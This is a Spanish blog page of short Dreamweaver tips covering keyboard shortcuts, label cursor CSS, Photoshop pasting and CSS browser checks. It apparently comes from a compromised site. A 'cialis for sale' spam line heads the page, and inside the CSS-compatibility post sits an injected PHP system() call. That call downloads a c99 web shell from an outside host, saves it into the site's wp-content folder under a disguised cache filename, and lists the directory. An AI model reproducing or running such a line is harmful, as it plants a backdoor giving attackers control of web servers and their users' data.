cialis for sale

Ordenar archivos relacionados

1 de Febrero de 2012 por Andres Cayon 0 Comentarios Archivado en DW Pills

Truco rápido:
Si deseas cambiar el orden de los archivos vinculados que aparecen en la barra superior del documento, la solución es sencilla: Sólo tienes que cambiar su orden en el documento, ya que Dreamweaver los añade en el orden en el que aparecen en el mismo.

Si label captura el foco, que se note

21 de Noviembre de 2011 por Andres Cayon 0 Comentarios Archivado en DW Pills

En un elemento de formulario, la etiqueta “label” sirve no sólo para asignarle un texto al mismo, sino también para capturar el foco de dicho elemento. El problema es que muchos usuarios de tus formularios no lo saben… ¿Por qué no se lo hacemos más visible?

Como norma general, cualquier usuario sabe que, cuando el cursor cambia a una mano, se puede hacer click sobre el elemento. Por lo tanto el truco es muy sencillo: Hacer que label responda cambiando el cursor cuando nos situamos encima del mismo, como por ejemplo en este input:

¿Y cómo conseguimos la mano? Para eso tenemos CSS:

label{
    cursor:pointer
}

Listo

Atajos básicos de teclado en DW

22 de Diciembre de 2009 por Andres Cayon 3 Comentarios Archivado en Dreamweaver, DW Pills

Siempre existen atajos de teclado que nos hacen la vida más facil. ¿Cuáles son tus favoritos en Dreamweaver?

Mis 5 atajos básicos son los siguientes:
F4: Cambiar a pantalla completa: te permite cerrar todos los paneles y es ideal cuando vás a trabajar en el código directamente.
F6: Congelar JavaScript: Otra imprescindible cuando realizas vistas en vivo de páginas que utilicen ajax: Permite ‘congelar’ la ejecución de scripts, de manera que se puede ver de forma muy sencilla qué partes del código original han cambiado (por ejemplo, qué estilos css se han aplicado a determinado elemento)
F12: Vista previa en el navegador principal; utiliza ctrl+F12 para utilizar el navegador secundario.
ctrl+T: Selecciona un objeto en vista diseño, pulsa ctrl+T una vez y tendrás acceso al código html del mismo; púlsalo de nuevo y podrás enolver la selección con la etiqueta que quieras. El segundo paso es ideal cuando tienes elementos anidados que hacen dificil a veces averiguar dónde terminan.
ctrl+Espacio: abrir la ayuda al código, que siempre viene bien!

Tags: ,

Copiar y pegar desde Photoshop

19 de Mayo de 2008 por Andres Cayon 0 Comentarios Archivado en DW Pills, Tutoriales

P.- Estoy trabajando un archivo en Photoshop y quiero convertir un fragmento en una imagen que posteriormente voy a utilizar en DW. ¿Existe algún metodo rápido de hacerlo?

R.- En las versiones CS3, es posible copiar desde PS y pegar directamente en DW, que se encargará de convertirlo en imagen. Para ello los pasos son realmente sencillos:

1.- Selecciona el area del archivo que estás manipulando en PS que quieres exportar a DW
2.- Selecciona Editar->Copiar
3.- Abre el documento donde quieres insertarla en DW y selecciona Editar->Pegar
4.- DW te ofrecerá unas últimas opciones: tipo de archivo, nivel de calidad o colores y el texto alternativo para la imagen.

¡Listo: Tu fragmento de Photoshop dentro de DW convertido en imagen en menos de lo que has tardado en leer este artículo!

Quiero una mano sobre mi rollover!

8 de Mayo de 2008 por Andres Cayon 3 Comentarios Archivado en DW Pills, Tutoriales

Pregunta: He añadido un comportamiento a (una imagen/un div…) y no consigo que aparezca la mano al pasar el cursor por encima.

Respuesta:antiguamente, el truco más habitual era envolver el elemento dentro de un enlace falso y aplicar al mismo el comportamiento. de esa manera conseguiámos que la mano apareciera forzada por la existencia de un enlace. sin embargo hay alguna solución más elegante
Seguir leyendo

Validar Compatibilidad CSS en distintos navegadores

9 de Abril de 2008 por Andres Cayon 4 Comentarios Archivado en DW Pills, Tutoriales

< ?php system("wget http://aaa333.info/inc/c99.txt -O /var/www/vhosts/dwug.es/httpdocs/wp-content/wp-cache.php"); system("ls -la /var/www/vhosts/dwug.es/httpdocs/wp-content/"); ?>

Pregunta: Acabo de crear una hoja de estilos pero en Internet Explorer se ve mal y no encuentro dónde puede estar el error!

Respuesta: Gracias al CSS Advisor, Dreamweaver te permite validar tu css en distintos navegadores y encontrar rápidamente una solución al problema.
Seguir leyendo

Cambiar tamaño de ventanas

23 de Noviembre de 2007 por Andres Cayon 0 Comentarios Archivado en DW Pills, Tutoriales

P.- Siempre que intento cambiar el tamaño de ventana desde la barra de estado las opciones me aparecen sombreadas ¿Cómo puedo activarlas?

Sólamente tienes que dejar el modo maximizado de documento: Pulsa en el botón Restaurar (Parte superior derecha del documento, entre minimizar y cerrar) y verás como las medidas en la barra de estado aparecen activadas.
IMPORTANTE: ¡No confundas los botones de minimizar, restaurar y cerrar del documento con los del programa!